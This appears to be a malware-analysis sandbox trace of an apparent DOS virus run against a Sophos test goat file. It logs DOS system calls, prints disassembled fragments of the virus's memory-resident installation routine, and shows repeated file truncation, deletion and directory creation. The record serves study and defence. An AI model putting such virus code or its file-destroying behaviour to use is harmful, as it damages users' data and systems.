Sample viewer




Time Syscall Op Syscall Name
2018-12-17T23:05:27.378008212Z 250 PC: 13fb7 | UNKNOWN!
2018-12-17T23:05:27.379284194Z 42 PC: 13fbf | Get date 0x13fbf: cmp dl, 1
0x13fc2: jne 0x13fca
0x13fc4: mov byte ptr cs:[bp + 0x609], 1
0x13fca: mov ax, es
0x13fcc: dec ax
0x13fcd: mov ds, ax
0x13fcf: cmp byte ptr [0], 0x5a
0x13fd4: jne 0x1401b
0x13fd6: sub word ptr [3], 0x180
0x13fdc: sub word ptr [0x12], 0x180
0x13fe2: mov es, word ptr [0x12]
0x13fe6: push cs
0x13fe7: pop ds
0x13fe8: mov si, bp
0x13fea: mov cx, 0x493
0x13fed: xor di, di
0x13fef: rep movsd dword ptr es:[di], dword ptr [si]
0x13ff1: xor ax, ax
0x13ff3: mov ds, ax
0x13ff5: push ds
2018-12-17T23:05:27.382701039Z 44 PC: 143f3 | Get time 0x143f3: ret
0x143f4: and dh, bh
0x143f6: and byte ptr [bp + si + 0x4f], al
0x143f9: dec bp
0x143fa: inc dx
0x143fb: push sp
0x143fc: push dx
0x143fd: inc cx
0x143fe: inc bx
0x143ff: dec bx
0x14400: and byte ptr [bp + 0x31], dh
0x14403: xor byte ptr cs:[bx + si], dh
0x14406: and byte ptr [di], ch
0x14408: and byte ptr [bp + di + 0x6f], al
0x1440b: and byte ptr fs:[bp + si + 0x79], ah
0x14411: and byte ptr [bp + 0x45], cl
0x14414: push si
0x14415: inc bp
0x14416: push dx
0x14417: in ax, dx
2018-12-17T23:05:27.385228771Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-17T23:05:27.391264369Z 0 PC: 12a89 | Program terminate





Time Syscall Op Syscall Name
2018-12-25T12:42:56.272835769Z 250 PC: 13fb7 | UNKNOWN!
2018-12-25T12:42:56.274436913Z 42 PC: 13fbf | Get date 0x13fbf: cmp dl, 1
0x13fc2: jne 0x13fca
0x13fc4: mov byte ptr cs:[bp + 0x609], 1
0x13fca: mov ax, es
0x13fcc: dec ax
0x13fcd: mov ds, ax
0x13fcf: cmp byte ptr [0], 0x5a
0x13fd4: jne 0x1401b
0x13fd6: sub word ptr [3], 0x180
0x13fdc: sub word ptr [0x12], 0x180
0x13fe2: mov es, word ptr [0x12]
0x13fe6: push cs
0x13fe7: pop ds
0x13fe8: mov si, bp
0x13fea: mov cx, 0x493
0x13fed: xor di, di
0x13fef: rep movsd dword ptr es:[di], dword ptr [si]
0x13ff1: xor ax, ax
0x13ff3: mov ds, ax
0x13ff5: push ds
2018-12-25T12:42:56.278800444Z 44 PC: 143f3 | Get time 0x143f3: ret
0x143f4: and dh, bh
0x143f6: and byte ptr [bp + si + 0x4f], al
0x143f9: dec bp
0x143fa: inc dx
0x143fb: push sp
0x143fc: push dx
0x143fd: inc cx
0x143fe: inc bx
0x143ff: dec bx
0x14400: and byte ptr [bp + 0x31], dh
0x14403: xor byte ptr cs:[bx + si], dh
0x14406: and byte ptr [di], ch
0x14408: and byte ptr [bp + di + 0x6f], al
0x1440b: and byte ptr fs:[bp + si + 0x79], ah
0x14411: and byte ptr [bp + 0x45], cl
0x14414: push si
0x14415: inc bp
0x14416: push dx
0x14417: in ax, dx
2018-12-25T12:42:56.281945947Z 26 PC: 9ea4c | Set disk transfer address
2018-12-25T12:42:56.283678691Z 25 PC: 9ea50 | Get default drive
2018-12-25T12:42:56.286024425Z 71 PC: 9ea5b | Get current directory
2018-12-25T12:42:56.289318803Z 59 PC: 9ea62 | Change current directory
2018-12-25T12:42:56.29426425Z 78 PC: 9ea6c | Find first file
2018-12-25T12:42:56.307288979Z 59 PC: 9ea91 | Change current directory
2018-12-25T12:42:56.317964572Z 47 PC: 9eaba | Get disk transfer address
2018-12-25T12:42:56.319396572Z 47 PC: 9eac4 | Get disk transfer address
2018-12-25T12:42:56.321317009Z 26 PC: 9eacb | Set disk transfer address
2018-12-25T12:42:56.322718831Z 78 PC: 9ead5 | Find first file
2018-12-25T12:42:56.33442542Z 67 PC: 9eae1 | Get or set file attributes
2018-12-25T12:42:56.412936034Z 60 PC: 9eae7 | Create or truncate file
2018-12-25T12:42:56.428032168Z 65 PC: 9eaf1 | Delete file (Filename = 'SLEEP.COM')
2018-12-25T12:42:56.44071661Z 62 PC: 9eaf5 | Close file
2018-12-25T12:42:56.457728137Z 57 PC: 9eaf9 | Create subdirectory
2018-12-25T12:42:56.472755054Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.475725467Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.486774663Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.501854358Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.513178115Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.515642591Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.531351852Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.534369597Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.545383408Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.560376678Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.572028381Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.574590953Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.591344644Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.594533728Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.606086053Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.620478093Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.639413801Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.641742558Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.656796524Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.660564278Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.671823126Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.685859683Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.697735461Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.700099106Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.714519312Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.718137421Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.729006931Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.742487531Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.75424908Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.756374739Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.770443284Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.774051374Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.785223842Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.798651486Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.810163116Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.812285268Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.825756493Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.82871696Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.840208857Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.853671672Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.864386577Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.867820846Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.881686492Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.884709484Z 67 PC: 9eae1 | Get or set file attributes (See above)
2018-12-25T12:42:56.896707562Z 60 PC: 9eae7 | Create or truncate file (See above)
2018-12-25T12:42:56.91317624Z 65 PC: 9eaf1 | Delete file (See above)
2018-12-25T12:42:56.924090242Z 62 PC: 9eaf5 | Close file (See above)
2018-12-25T12:42:56.927171084Z 57 PC: 9eaf9 | Create subdirectory (See above)
2018-12-25T12:42:56.942952418Z 79 PC: 9ead5 | Find next file (See above)
2018-12-25T12:42:56.954307633Z 26 PC: 9eb09 | Set disk transfer address
2018-12-25T12:42:56.95586273Z 57 PC: 9ea9b | Create subdirectory
2018-12-25T12:42:56.970699227Z 57 PC: 9eaa4 | Create subdirectory
2018-12-25T12:42:56.985212004Z 59 PC: 9eaad | Change current directory
2018-12-25T12:42:56.989011833Z 47 PC: 9eaba | Get disk transfer address (See above)
2018-12-25T12:42:56.991271581Z 47 PC: 9eac4 | Get disk transfer address (See above)
2018-12-25T12:42:56.992946982Z 26 PC: 9eacb | Set disk transfer address (See above)
2018-12-25T12:42:56.994604272Z 78 PC: 9ead5 | Find first file (See above)
2018-12-25T12:42:57.002414706Z 26 PC: 9eb09 | Set disk transfer address (See above)





Time Syscall Op Syscall Name
2018-12-25T12:42:56.331795514Z 250 PC: 13fb7 | UNKNOWN!
2018-12-25T12:42:56.333109777Z 42 PC: 13fbf | Get date 0x13fbf: cmp dl, 1
0x13fc2: jne 0x13fca
0x13fc4: mov byte ptr cs:[bp + 0x609], 1
0x13fca: mov ax, es
0x13fcc: dec ax
0x13fcd: mov ds, ax
0x13fcf: cmp byte ptr [0], 0x5a
0x13fd4: jne 0x1401b
0x13fd6: sub word ptr [3], 0x180
0x13fdc: sub word ptr [0x12], 0x180
0x13fe2: mov es, word ptr [0x12]
0x13fe6: push cs
0x13fe7: pop ds
0x13fe8: mov si, bp
0x13fea: mov cx, 0x493
0x13fed: xor di, di
0x13fef: rep movsd dword ptr es:[di], dword ptr [si]
0x13ff1: xor ax, ax
0x13ff3: mov ds, ax
0x13ff5: push ds
2018-12-25T12:42:56.336961992Z 44 PC: 143f3 | Get time 0x143f3: ret
0x143f4: and dh, bh
0x143f6: and byte ptr [bp + si + 0x4f], al
0x143f9: dec bp
0x143fa: inc dx
0x143fb: push sp
0x143fc: push dx
0x143fd: inc cx
0x143fe: inc bx
0x143ff: dec bx
0x14400: and byte ptr [bp + 0x31], dh
0x14403: xor byte ptr cs:[bx + si], dh
0x14406: and byte ptr [di], ch
0x14408: and byte ptr [bp + di + 0x6f], al
0x1440b: and byte ptr fs:[bp + si + 0x79], ah
0x14411: and byte ptr [bp + 0x45], cl
0x14414: push si
0x14415: inc bp
0x14416: push dx
0x14417: in ax, dx
2018-12-25T12:42:56.33967183Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:42:56.346256496Z 0 PC: 12a89 | Program terminate